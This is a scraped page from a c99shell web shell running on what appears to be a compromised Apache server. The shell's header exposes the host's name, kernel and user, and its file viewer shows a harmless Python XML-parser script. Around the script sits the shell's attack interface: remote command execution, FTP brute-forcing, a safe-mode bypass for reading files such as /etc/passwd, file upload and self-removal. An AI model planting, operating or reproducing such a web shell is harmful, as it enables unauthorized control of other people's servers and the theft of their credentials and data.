!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/bin/   drwxr-xr-x
Free 52.24 GB of 127.8 GB (40.87%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     xmlproc_parse (3.1 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/python """ A command-line interface to the xmlproc parser. It continues parsing even after fatal errors, in order to be find more errors, since this does not mean feeding data to the application after a fatal error (which would be in violation of the spec). """ usage=\ """ Usage: xpcmd.py [options] [urltodoc] ---Options: -l language: ISO 3166 language code for language to use in error messages -o format: Format to output parsed XML. 'e': ESIS, 'x': canonical XML and 'n': normalized XML. No data will be output if this option is not specified. urltodoc: URL to the document to parse. (You can use plain file names as well.) Can be omitted if a catalog is specified and contains a DOCUMENT entry. -n: Report qualified names as 'URI name'. (Namespace processing.) --nowarn: Don't write warnings to console. --entstck: Show entity stack on errors. --extsub: Read the external subset of documents. """ # --- INITIALIZATION import sys,getopt from xml.parsers.xmlproc import xmlproc, _outputters # --- Interpreting options try: (options,sysids)=getopt.getopt(sys.argv[1:],"l:o:n", ["nowarn","entstck","rawxml","extsub"]) except getopt.error,e: print "Usage error: "+e.msg print usage sys.exit(1) pf=None namespaces=0 app=xmlproc.Application() warnings=1 entstack=0 rawxml=0 extsub=0 p=xmlproc.XMLProcessor() for option in options: if option[0]=="-l": try: p.set_error_language(option[1]) except KeyError: print "Error language '%s' not available" % option[1] elif option[0]=="-o": if option[1]=="e" or option[1]=="E": app=_outputters.ESISDocHandler() elif option[1]=="x" or option[1]=="X": app=_outputters.Canonizer() elif option[1]=="n" or option[1]=="N": app=_outputters.DocGenerator() else: print "Error: Unknown output format "+option[1] print usage elif option[0]=="-n": namespaces=1 elif option[0]=="--nowarn": warnings=0 elif option[0]=="--entstck": entstack=1 elif option[0]=="--rawxml": rawxml=1 elif option[0]=="--extsub": extsub=1 # Acting on option settings err=_outputters.MyErrorHandler(p, p, warnings, entstack, rawxml) p.set_error_handler(err) if namespaces: from xml.parsers.xmlproc import namespace nsf=namespace.NamespaceFilter(p) nsf.set_application(app) p.set_application(nsf) else: p.set_application(app) if len(sysids)==0: print "You must specify a file to parse" print usage sys.exit(1) if extsub: p.set_read_external_subset(extsub) # --- Starting parse print "xmlproc version %s" % xmlproc.version for sysid in sysids: print print "Parsing '%s'" % sysid p.set_data_after_wf_error(0) p.parse_resource(sysid) print "Parse complete, %d error(s)" % err.errors, if warnings: print "and %d warning(s)" % err.warnings else: print err.reset() p.reset()

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.006 ]--